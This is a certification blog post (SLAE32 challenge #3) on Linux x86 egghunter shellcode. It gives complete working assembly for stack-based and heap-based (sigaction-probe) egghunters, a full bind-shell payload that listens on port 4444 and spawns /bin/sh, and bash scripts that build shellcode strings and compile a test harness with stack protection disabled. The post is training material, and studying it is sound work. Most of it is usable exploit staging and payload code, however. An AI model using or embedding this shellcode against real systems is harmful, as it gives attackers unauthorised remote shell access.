SLAE32 Challenge #3 - Linux egghunter Shellcode in Assembly

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-644

GitHub resource containing challenge files:

https://github.com/bl305/SLAE32

Local link to source files:

http://itfanatic.com/files/Challenge_03_Final.ZIP


Source used:

http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf

Memory layout

http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory

Egghunter using stack:

First things first. Anatomy of the memory can be seen in the following picture:

[Image: memory layout of a Linux process]

An egghunter works the same way as an egg hunt in real life: someone hides an egg, and someone else goes looking for it until they find it.

There are two implementations below:

  1. Egghunter in stack (easier, will fail with ASLR)
  2. Egghunter in heap (more robust)

1. Egghunter in stack:
You can look at it as a two-stage execution model. We put an egg at the beginning of our shellcode on the stack (stage 2); here the egg is the string "bali", and we put it there twice. Why? Because the search code itself contains the egg value as an operand, so a search for a single egg could find the hunter instead of the payload. Two consecutive copies of the egg make the marker unique in memory. We then build a search routine (stage 1) that reads memory in one direction, looks for the doubled egg, and executes the shellcode that follows it. The limitation is that it can only search one memory segment, or several segments with no gaps in between.
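The doubled-egg idea can be sketched in C before moving to assembly. This is only an illustration on an ordinary byte buffer, not the hunter itself; the function name find_payload is hypothetical.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: scan buf for the 4-byte egg repeated twice in a row
 * and return the offset of the first byte after the doubled egg (where the
 * payload starts), or -1 if the doubled egg is not present. */
long find_payload(const unsigned char *buf, size_t len, const char egg[4])
{
    for (size_t i = 0; i + 8 <= len; i++) {
        if (memcmp(buf + i, egg, 4) == 0 &&
            memcmp(buf + i + 4, egg, 4) == 0)
            return (long)(i + 8);
    }
    return -1;
}
```

A single copy of the egg, such as the one embedded in the hunter, is skipped because the second comparison fails.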

2. Egghunter in heap:

Same logic, except that the egg will be in the heap. The tricky thing about the heap is that we have no clue about the exact memory address, so we search sequentially from the low addresses, where the .text segment comes first. Along the way we will hit addresses that are not mapped, and reading them directly would raise SIGSEGV. That does not mean anything is broken; it only means there is nothing readable at that address, so we leave it alone :). We need a check for this case to be able to search all the way through the heap.

Stack based egghunter

I start reading memory from an address that belongs to the running program, so that the search begins at a valid address (held in EAX). The "_next" label increases the memory address for the next read. The "_isegg" label reads the memory and acts on the result. I hate doing error checks, so I simply read memory in one direction ("back"/"forward" is very relative, but in the logical context we look back from EAX :)) until the egg turns up. My egg is "bali" = 0x696c6162; the bytes appear reversed because x86 is little-endian. So we look at the dword 8 bytes before EAX and compare it to the egg. If it does not match, we increase the memory address and try again. If it matches, we compare the dword 4 bytes before EAX to the egg as well. If that fails, we increase the address and start over with the new address. If it matches too, we have found the doubled egg, EAX points at the shellcode, and we execute it: JMP EAX
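The relation between the egg string and the immediate value in the hunter can be checked with a few lines of C. This is a minimal sketch; the helper name egg_to_dword is hypothetical.

```c
#include <stdint.h>

/* Hypothetical helper: build the 32-bit value a little-endian CPU reads when
 * the four egg characters sit consecutively in memory. The first character
 * becomes the least significant byte. */
uint32_t egg_to_dword(const char egg[4])
{
    return (uint32_t)(unsigned char)egg[0]
         | (uint32_t)(unsigned char)egg[1] << 8
         | (uint32_t)(unsigned char)egg[2] << 16
         | (uint32_t)(unsigned char)egg[3] << 24;
}
```

For "bali" this gives 0x696c6162, which is the constant used in the cmp instructions.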

Assembly code:

global _start
 
section .text
 
_start:
    pop eax ;load the dword on top of the stack (the return address when called from the C harness) as the start address
_next:
    inc eax ;advance to the next memory address
 
_isegg:
 
    cmp dword [eax-0x8],0x696c6162 ;first copy of the egg, 8 bytes before EAX
    jne _next ;if no match, go and increase eax to point to the next address in memory
 
    cmp dword [eax-0x4],0x696c6162 ;second copy of the egg, 4 bytes before EAX - positive match
    jne _next ;if second match fails, go to the next memory address
 
    jmp eax ;both copies matched, EAX points at the shellcode: execute it

The actual shellcode is from: SLAE32 Challenge #1 Linux Bind Shell in Assembly

The only modification to it is the text: db "balibali". This is our egg.

Bind shell script with the egg in it:

global _start
 
section .text
 
db "balibali"
 
_start:
 
;sockfd = socket(AF_INET, SOCK_STREAM, 0)
xor eax,eax ;clean eax
mov al,0x66 ;syscall number 102 = socketcall
xor ebx,ebx ;zero out ebx
push ebx ;stack protocol=0, default (could be 6 for TCP)
inc ebx ;ebx=1, socketcall sub-call SYS_SOCKET
push ebx ;stack type=1, SOCK_STREAM
push byte 0x2 ;stack domain=2, AF_INET
mov ecx,esp ;store a pointer to the socket() arguments
int 0x80 ;call the syscall, it returns the socket file descriptor in EAX
 
mov esi, eax ;store sockfd into ESI
 
;bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
mov al,0x66 ;syscall number 102 = socketcall
pop ebx ;take the 2 from the stack: ebx=2, socketcall sub-call SYS_BIND
;pop esi ; remove the 0x1 from stack and leave 0x0
 
;prepare struct
xor edx,edx ;zero out edx
push edx ;set the sin_addr=0 (INADDR_ANY)
push word 0x5C11 ;set sin_port=4444 (0x115C, stored in network byte order)
push word bx ;sin_family=AF_INET (0x2)
mov ecx, esp ;save pointer
;prepare struct end
 
push 0x10 ;addrlen=16 structure length
push ecx ;struct sockaddr pointer
push esi ;sockfd (the descriptor itself, not a pointer)
mov ecx, esp ;pointer to bind() args
int 0x80 ;execute bind
 
;listen
mov al,0x66 ;syscall 102 = socketcall
mov bl, 0x4 ;SYS_LISTEN
push ebx ;backlog=4 (ebx holds 0x4 at this point)
push esi ;sockfd
mov ecx,esp ;save pointer to args
int 0x80 ;call syscall
 
;accept
mov al,0x66 ;syscall 102 = socketcall
mov bl, 0x5 ;SYS_ACCEPT
push edx ;addrlen=NULL
push edx ;addr=NULL
push esi ;sockfd
mov ecx, esp ;save pointer to args
int 0x80 ;call syscall
 
 
;redirect
xchg ebx, eax ;ebx = client socket fd returned by accept (oldfd in dup2), eax = 0x5
pop ecx ;pop the listening sockfd pushed last; it is a small value, so the upper bytes of ecx are zero
mov cl, 0x2 ;set counter to 2, this will be newfd in dup2
;loop to call dup2 3 times and duplicate the file descriptor onto STDIN, STDOUT and STDERR
myloop:
 mov al,0x3F ;dup2 syscall number (63)
 int 0x80 ;syscall dup2
 dec ecx ;decrement counter
 jns myloop ;jump to loop as long as SF is not set to 1
 
 
;execve
xor eax,eax
push eax ;push the terminating 0x0
push 0x68732f2f ;"hs//" - the trick is that "//" behaves like "/" and pads the path to a multiple of four bytes
push 0x6e69622f ;"nib/"
mov ebx, esp ;save the pointer to filename "/bin//sh"
 
push eax ;NULL
mov ecx, esp ;argv: pointer to an empty, NULL-terminated list
 
push eax ;NULL
mov edx, esp ;envp: pointer to an empty, NULL-terminated list
 
mov al,0xb ;execve syscall number (11)
int 0x80 ;execute syscall
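The constant 0x5C11 for port 4444 may look odd at first. A short C sketch (the function name port_to_imm16 is hypothetical) shows where it comes from: sin_port is stored in network byte order, and a little-endian "push word" writes the low byte first, so the two bytes of the port have to be swapped in the immediate.

```c
#include <stdint.h>

/* Hypothetical helper: return the 16-bit immediate that, when stored by a
 * little-endian CPU, leaves the port in network (big-endian) byte order. */
uint16_t port_to_imm16(uint16_t port)
{
    return (uint16_t)((port >> 8) | (port << 8));
}
```

Port 4444 is 0x115C, so the immediate becomes 0x5C11 and memory holds the bytes 0x11 0x5C.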

I have developed a compile script that changes the egg in both sources and builds the whole thing. Be careful: NULL characters in the egg break the whole fun, because they actually terminate the string early.
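A quick way to check assembled bytes for this problem is a small scan for 0x00. The sketch below is only an illustration; the helper name first_null_byte is hypothetical.

```c
#include <stddef.h>

/* Hypothetical helper: return the index of the first 0x00 byte in
 * code[0..len), or -1 when the buffer contains none. */
long first_null_byte(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (code[i] == 0x00)
            return (long)i;
    }
    return -1;
}
```

For example, "mov eax, 0x66" assembles to b8 66 00 00 00 and would be reported at index 2, while "xor eax,eax" followed by "mov al,0x66" (31 c0 b0 66) contains no zero byte. That is why the shellcode above uses the second form.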

Compile script:

#!/bin/bash
 
echo '####################################################################'
echo 'Usage: ./compile.sh <egghunter> <shellcode> <egg>'
echo 'Example (without extensions!): ./compile.sh egghunter shellcode woof'
echo '####################################################################'
echo '[+] Changing egg to '$3' ...'
>eggcode.txt
for i in `echo -n $3|rev|tr -d '\n'|xxd -g 1 -c 1|cut -d " " -f2|grep -Eo '^[0-9a-f]{2}$'` ; do echo -n "$i" >>eggcode.txt ; done
echo '[+] New eggcode in hex little-endian:'
myegg=`cat eggcode.txt`
echo $myegg
cp $1.nasm $1.nasm_orig
sed s/0x696c6162/0x$myegg/g < $1.nasm_orig > $1.nasm
 
echo '[+] Assembling '$1' Egghunter with Nasm ... '
nasm -f elf32 -o $1.o $1.nasm
 
echo '[+] Linking ...'
ld -o $1 $1.o
 
echo '[+] Objdump ...'
>egghunter.txt
for i in `objdump -d $1|tr '\t' ' '|tr ' ' '\n'|grep -Eo '^[0-9a-f]{2}$'` ; do echo -n "\x$i" >>egghunter.txt ; done
myegghunter=`cat egghunter.txt`
echo $myegghunter
 
 
###########################################################################
#changing egg plaintext
cp $2.nasm $2.nasm_orig
sed s/balibali/$3$3/g < $2.nasm_orig > $2.nasm
 
echo '[+] Assembling '$2' payload shellcode with Nasm ... '
nasm -f elf32 -o $2.o $2.nasm
 
echo '[+] Linking ...'
ld -o $2 $2.o
 
echo '[+] Objdump ...'
>shellcode.txt
for i in `objdump -d $2|tr '\t' ' '|tr ' ' '\n'|grep -Eo '^[0-9a-f]{2}$'` ; do echo -n "\x$i" >>shellcode.txt ; done
myshellcode=`cat shellcode.txt`
echo $myshellcode
 
echo '[+] Assemble shellcode C ...'
 
echo "#include<stdio.h>" >shellcode.c
echo "#include<string.h>" >>shellcode.c
echo "unsigned char egghuntercode[] = \"\\" >>shellcode.c
echo $myegghunter"\";" >>shellcode.c
echo "unsigned char shellcode[] = \"\\" >>shellcode.c
echo $myshellcode"\";" >>shellcode.c
echo "int main()" >>shellcode.c
echo "{" >>shellcode.c
echo "printf(\"Egghuntercode Length:  %zu\n\", strlen((char *)egghuntercode));" >>shellcode.c
echo "printf(\"Shellcode Length    :  %zu\n\", strlen((char *)shellcode));" >>shellcode.c
echo "  int (*ret)() = (int(*)())egghuntercode;" >>shellcode.c
echo "  ret();" >>shellcode.c
echo "}" >>shellcode.c
 
echo '[+] Compile shellcode.c'
 
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
 
echo '[+] Done!'  
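The objdump loops in the script turn raw opcode bytes into the "\x.." text that ends up in shellcode.c. The same formatting step can be sketched in C; the helper name to_c_escapes is hypothetical and the script itself does not use it.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: write code[0..len) into out as "\x31\xc0..." text.
 * out must have room for at least 4 * len + 1 characters.
 * Returns the number of characters written, not counting the final NUL. */
size_t to_c_escapes(const unsigned char *code, size_t len, char *out)
{
    size_t pos = 0;
    for (size_t i = 0; i < len; i++)
        pos += (size_t)sprintf(out + pos, "\\x%02x", code[i]);
    out[pos] = '\0';
    return pos;
}
```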

Egghunter using heap:

So this is more challenging. Why? Because we need to verify in assembly that memory is readable before we read it. I'm not going to reinvent the wheel, but use the brains of others. I found that using sigaction is a good solution:

http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf

Function prototype:

int sigaction(int signum, const struct sigaction *act, struct sigaction *oldact);

Purpose: changes the action a process takes on receipt of a specific signal. It can handle any valid signal except SIGKILL and SIGSTOP. What matters for the egghunter is that the kernel validates the act pointer: if it points to unreadable memory, the call returns EFAULT instead of the process receiving SIGSEGV.

Sigaction structure definition as per the man page:

struct sigaction {
    void (*sa_handler)(int);
    void (*sa_sigaction)(int, siginfo_t *, void *);
    sigset_t sa_mask;
    int sa_flags;
    void (*sa_restorer)(void);
};
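The reason sigaction is useful here is that the kernel has to read the act structure, and it reports EFAULT when it cannot. The sketch below shows this from C on Linux. It is not the hunter's code: it assumes the raw rt_sigaction syscall (the glibc wrapper would dereference the pointer itself), an 8-byte kernel signal set as on x86, and it passes signal number 0, which is invalid, so no handler is ever changed. The name is_readable is hypothetical.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stddef.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Hypothetical helper: returns 0 when the kernel cannot read a sigaction
 * structure at addr (EFAULT), 1 otherwise. With signal number 0 a readable
 * address makes the call fail with EINVAL, so nothing is installed. */
int is_readable(const void *addr)
{
    long rc = syscall(SYS_rt_sigaction, 0, addr, NULL, (long)8);
    return !(rc == -1 && errno == EFAULT);
}
```

The assembly hunter does the same test by comparing the low byte of the return value with 0xf2, the low byte of -EFAULT (-14).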

I have used the "scasd" instruction, as suggested in the referenced paper, to compare the egg to the contents of memory. To start with a clean sheet, I execute "cld" first, which clears the direction flag (not the carry flag). Without it scasd could decrement EDI instead of incrementing it, and the search would fail.

By initializing edi to the pointer value that is currently in ecx, the scasd instruction can be used to compare the memory that edi points to with the dword value that is currently in eax. This allows for a comparison and has the added side effect of incrementing edi by four after each comparison, whether or not it matched.
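The behaviour of scasd with the direction flag cleared can be modelled in a few lines of C. This is a hypothetical model for illustration (the name scasd_model is not from the paper); it reads the dword byte by byte in little-endian order, as x86 does.

```c
#include <stdint.h>

/* Hypothetical model of scasd with DF = 0: compare eax with the dword at
 * *edi, then advance *edi by 4 whether or not the values matched.
 * Returns 1 when they are equal (ZF would be set), otherwise 0. */
int scasd_model(uint32_t eax, const unsigned char **edi)
{
    const unsigned char *p = *edi;
    uint32_t value = (uint32_t)p[0]
                   | (uint32_t)p[1] << 8
                   | (uint32_t)p[2] << 16
                   | (uint32_t)p[3] << 24;   /* little-endian load */
    *edi = p + 4;                            /* edi += 4 in both cases */
    return value == eax;
}
```

Two successful calls in a row leave edi 8 bytes past the start of the doubled egg, which is exactly where the shellcode begins.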

The code walks through memory page by page, based on the page size of the given OS (it can be retrieved using "getconf PAGE_SIZE", in our case 4096). Unfortunately 4096 (0x1000) would require us to put nulls in our code, which would terminate it. So I used a trick: I OR in 4095 (0xfff) and then increase the result by 1.
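The arithmetic behind the trick can be written out in C. This is a sketch of the calculation only, assuming a 4096-byte page; the function name next_page_start is hypothetical.

```c
#include <stdint.h>

/* Hypothetical helper: mirror "or cx,0xfff" followed by "inc ecx".
 * Setting the low 12 bits and adding 1 gives the first address of the
 * following 4096-byte page, without ever using the constant 0x1000. */
uint32_t next_page_start(uint32_t addr)
{
    return (addr | 0xfffu) + 1u;
}
```

For example, 0x08048123 becomes 0x08049000. An address that is already page aligned, such as 0x1000, moves on to 0x2000.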

The following code is commented below. It basically compares memory four bytes at a time to the egg. If the egg matches twice in a row, the code at EDI is executed.

Assembly code:

global _start                   
 
section .text
_start:
        cld 		;clear the direction flag so that scasd increments edi
        xor edx,edx 	;clear edx
        xor ecx,ecx 	;clear ecx
 
next_page:
        or cx,0xfff 	;set the low 12 bits (4095) - the output of command "getconf PAGE_SIZE" is 4096
		    	;to avoid zeroes in shellcode, we OR in 4095 and let the inc below add 1
next_addr:
        inc ecx ;next address to test (the start of the next page after the OR above)
 
;;     lea ebx, [ecx]	;[ecx+0x4] proper alignment, avoiding SIGSEGV in first scasd
 
	push 0x43 	;sigaction() syscall number (67)
	pop eax
	int 0x80 	;make the syscall, ecx is the "act" pointer that the kernel validates
 
	cmp al, 0xf2 	;low byte of -EFAULT (-14): the address is not readable
	je next_page	;skip the rest of this page
	mov eax, 0x696c6162	;egg code to find
	mov edi,ecx 	;edi contains the address to look at
	scasd		;compare eax with [edi], edi is increased by 4 either way
	jnz next_addr	;no marker found, jump to next address
	scasd		;compare the second copy of the egg
	jnz next_addr	;no marker found, jump to next address
	jmp edi		;found both eggs, edi points to the shellcode
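To make the control flow of the hunter easier to follow, here is a simplified model in C. It is a sketch under stated assumptions, not a translation: memory is an ordinary buffer split into 4096-byte pages, and the sigaction probe is replaced by a lookup in a hypothetical mapped[] table. The names hunt and MODEL_PAGE are made up for this example.

```c
#include <stddef.h>
#include <string.h>

#define MODEL_PAGE 4096u

/* Hypothetical model of the loop: mem is a fake address space of npages
 * pages and mapped[i] is nonzero when page i is readable. Returns the offset
 * just past the doubled egg, or -1 when the whole space has been searched. */
long hunt(const unsigned char *mem, const unsigned char *mapped,
          size_t npages, const char egg[4])
{
    size_t end = npages * MODEL_PAGE;
    size_t addr = 0;

    for (;;) {
        addr++;                                   /* next_addr: inc ecx */
        if (addr + 8 > end)
            return -1;                            /* model only: stop at the end */
        if (!mapped[addr / MODEL_PAGE] || !mapped[(addr + 7) / MODEL_PAGE]) {
            addr |= MODEL_PAGE - 1;               /* next_page: or cx,0xfff */
            continue;                             /* the inc above completes the step */
        }
        if (memcmp(mem + addr, egg, 4) == 0 &&    /* first scasd */
            memcmp(mem + addr + 4, egg, 4) == 0)  /* second scasd */
            return (long)(addr + 8);              /* jmp edi */
    }
}
```

Unreadable pages are skipped in one step, while readable pages are scanned one byte at a time, just like the next_page and next_addr labels in the assembly.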

Compile script:

#!/bin/bash
 
echo '####################################################################'
echo 'Usage: ./compile.sh <egghunter> <shellcode> <egg>'
echo 'Example (without extensions!): ./compile.sh egghunter shellcode woof'
echo '####################################################################'
echo '[+] Changing egg to '$3' ...'
>eggcode.txt
for i in `echo -n $3|rev|tr -d '\n'|xxd -g 1 -c 1|cut -d " " -f2|grep -Eo '^[0-9a-f]{2}$'` ; do echo -n "$i" >>eggcode.txt ; done
echo '[+] New eggcode in hex little-endian:'
myegg=`cat eggcode.txt`
echo $myegg
cp $1.nasm $1.nasm_orig
sed s/0x696c6162/0x$myegg/g < $1.nasm_orig > $1.nasm
 
echo '[+] Assembling '$1' Egghunter with Nasm ... '
nasm -f elf32 -o $1.o $1.nasm
 
echo '[+] Linking ...'
ld -o $1 $1.o
 
echo '[+] Objdump ...'
>egghunter.txt
for i in `objdump -d $1|tr '\t' ' '|tr ' ' '\n'|grep -Eo '^[0-9a-f]{2}$'` ; do echo -n "\x$i" >>egghunter.txt ; done
myegghunter=`cat egghunter.txt`
echo $myegghunter
 
 
###########################################################################
#changing egg plaintext
cp $2.nasm $2.nasm_orig
sed s/balibali/$3$3/g < $2.nasm_orig > $2.nasm
 
echo '[+] Assembling '$2' payload shellcode with Nasm ... '
nasm -f elf32 -o $2.o $2.nasm
 
echo '[+] Linking ...'
ld -o $2 $2.o
 
echo '[+] Objdump ...'
>shellcode.txt
for i in `objdump -d $2|tr '\t' ' '|tr ' ' '\n'|grep -Eo '^[0-9a-f]{2}$'` ; do echo -n "\x$i" >>shellcode.txt ; done
myshellcode=`cat shellcode.txt`
echo $myshellcode
 
echo '[+] Assemble shellcode C ...'
#myshellcode="AABBCCDDEEFFABCD"
echo "#include<stdio.h>" >shellcode.c
echo "#include<stdlib.h>" >>shellcode.c
echo "#include<string.h>" >>shellcode.c
echo "unsigned char egg[] = \"$3\";" >>shellcode.c
echo "unsigned char egghuntercode[] = \"\\" >>shellcode.c
echo $myegghunter"\";" >>shellcode.c
echo "unsigned char shellcode[] = \"\\" >>shellcode.c
echo $myshellcode"\";" >>shellcode.c
echo "int main()" >>shellcode.c
echo "{" >>shellcode.c
echo "printf(\"Egghuntercode Length:  %zu\n\", strlen((char *)egghuntercode));" >>shellcode.c
echo "printf(\"Shellcode Length    :  %zu\n\", strlen((char *)shellcode));" >>shellcode.c
echo "char *heap;" >> shellcode.c
echo "heap=malloc(400);" >> shellcode.c
echo "printf(\"Memory address of shellcode: %p\n\",heap);" >> shellcode.c
echo "memcpy(heap+0,egg,4);" >> shellcode.c
echo "memcpy(heap+4,egg,4);" >> shellcode.c
echo "memcpy(heap+8,shellcode, sizeof(shellcode)-1);" >> shellcode.c
echo "  int (*ret)() = (int(*)())egghuntercode;" >>shellcode.c
echo "  ret();" >>shellcode.c
echo "}" >>shellcode.c
 
echo '[+] Compile shellcode.c'
 
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
 
echo '[+] Done!'  